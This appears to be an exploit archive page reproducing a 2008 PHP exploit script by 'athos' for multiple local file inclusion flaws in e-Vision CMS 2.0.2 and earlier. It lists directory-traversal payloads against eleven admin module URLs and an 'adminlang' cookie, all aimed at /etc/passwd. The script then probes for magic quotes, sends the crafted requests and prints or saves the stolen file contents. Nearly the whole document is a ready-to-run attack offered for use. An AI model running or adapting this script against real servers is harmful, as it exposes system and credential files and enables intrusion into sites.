Home / os / win10

evisioncms-lfi.txt

Posted on 07 November 2008

<?php error_reporting(0); ini_set("default_socket_timeout",5); /* e-Vision <= 2.0.2 Multiple Local File Inclusion Exploit ------------------------------------------------------- by athos - download http://sourceforge.net ------------------------------------------------------- Works with magic quotes gpc turned off javascript: document.cookie="adminlang=../../../../etc/passwd"; modules/3rdparty/adminpart/add3rdparty.php?module=../../../../../../etc/passwd modules/polling/adminpart/addpolling.php?module=../../../../../etc/passwd modules/contact/adminpart/addcontact.php?module=../../../../etc/passwd modules/brandnews/adminpart/addbrandnews.php?module=../../../etc/passwd modules/newsletter/adminpart/addnewsletter.php?module=../../../../etc/passwd modules/game/adminpart/addgame.php?module=../../../../etc/passwd modules/tour/adminpart/addtour.php?module=../../../etc/passwd modules/articles/adminpart/addarticles.php?module=../../../../etc/passwd modules/product/adminpart/addproduct.php?module=../../../../etc/passwd modules/plain/adminpart/addplain.php?module=../../../../../etc/passwd ../../etc/passwd and nullbyte how to fix? addslashes($_GET['module']); so you remove the nullbyte...isn't a good fix coded by me */ $exploit = new Exploit; $domain = $argv[1]; $mymode = $argv[2]; $exploit->starting(); $exploit->is_vulnerable($domain); $exploit->exploiting($domain,$mymode); class Exploit { function http_request($host,$data) { if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) { echo "socket_create() error! "; exit; } if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) { echo "socket_set_option() error! "; exit; } if(!socket_connect($socket,$host,80)) { echo "socket_connect() error! "; exit; } if(!socket_write($socket,$data,strlen($data))) { echo "socket_write() errror! "; exit; } while($get = socket_read($socket,1024,PHP_NORMAL_READ)) { $content .= $get; } socket_close($socket); $array = array( 'HTTP/1.1 404 Not Found', 'HTTP/1.1 300 Multiple Choices', 'HTTP/1.1 301 Moved Permanently', 'HTTP/1.1 302 Found', 'HTTP/1.1 304 Not Modified', 'HTTP/1.1 400 Bad Request', 'HTTP/1.1 401 Unauthorized', 'HTTP/1.1 402 Payment Required', 'HTTP/1.1 403 Forbidden', 'HTTP/1.1 405 Method Not Allowed', 'HTTP/1.1 406 Not Acceptable', 'HTTP/1.1 407 Proxy Authentication Required', 'HTTP/1.1 408 Request Timeout', 'HTTP/1.1 409 Conflict', 'HTTP/1.1 410 Gone', 'HTTP/1.1 411 Length Required', 'HTTP/1.1 412 Precondition Failed', 'HTTP/1.1 413 Request Entity Too Large', 'HTTP/1.1 414 Request-URI Too Long', 'HTTP/1.1 415 Unsupported Media Type', 'HTTP/1.1 416 Request Range Not Satisfiable', 'HTTP/1.1 417 Expectation Failed', 'HTTP/1.1 Retry With', ); for($i=0;$i<=count($array);$i++) if(eregi($array[$i],$content)) { return ("$array[$i] "); break; } else { return ("$content "); break; } } function is_vulnerable($host) { $host = explode('/',$host); $header .= "GET /$host[1]/modules/3rdparty/adminpart/add3rdparty.php?module=%27 HTTP/1.1 "; $header .= "Host: $host[0] "; $header .= "User-Agent: athos~doesntexist "; $header .= "Connection: close "; if(stristr($this->http_request($host[0],$header),"\'")) { echo "[+] Magic Quotes GPC On! "; echo "[+] Exploit Failed! "; exit; } else { return false; } } function starting() { global $argv; if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1])) { echo "[+] e-Vision <= 2.0.2 Multiple Local File Inclusion Exploit "; echo "[+] by athos "; echo " ----------------------------------------------------------- "; echo "[+] Usage: php $argv[0] [host/path] [mode] "; echo "[+] Usage: php $argv[0] [host/path] [save] "; echo "[+] Usage: php $argv[0] [host/path] "; exit; } } function exploiting($host,$mode) { $host = explode('/',$host); $i = 0; echo "[+] Local File (ex: ../../etc/passwd%00) "; echo "[+] Local File: "; $file = stripslashes(trim(fgets(STDIN))); if(empty($file)) die("you fail"); $array = array ( "3rdparty/adminpart/add3rdparty.php?module=$file", "polling/adminpart/addpolling.php?module=$file", "contact/adminpart/addcontact.php?module=$file", "brandnews/adminpart/addbrandnews.php?module=$file", "newsletter/adminpart/addnewsletter.php?module=$file", "game/adminpart/addgame.php?module=$file", "tour/adminpart/addtour.php?module=$file", "articles/adminpart/addarticles.php?module=$file", "product/adminpart/addproduct.php?module=$file", "plain/adminpart/addplain.php?module=$file", ); if($i > 9) { $write .= "GET /$host[1]/admin/ind_ex.php HTTP/1.1 "; $write .= "Host: $host[0] "; $write .= "User-Agent: doesntexist "; $write .= "Cookie: adminlang=$file; path=/admin "; $write .= "Connection: close "; } else { $write .= "GET /$host[1]/modules/$array[$i] HTTP/1.1 "; $write .= "Host: $host[0] "; $write .= "User-Agent: you are lost "; $write .= "Connection: close "; } if(stristr($this->http_request($host[0],$write),'No such file or directory in')) { $i++; } else { if($mode == "save") { $rand = rand(0,99999); fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write))); echo "[+] File $rand Saved Successfully! "; echo "[+] Exploit Terminated! "; exit; } else { echo $this->http_request($host[0],$write); exit; } } } } // StAkeR - StAkeR[at]hotmail[dot]it // Note: if you add on msn i don't accept! // Greetz "er biondo"

 

TOP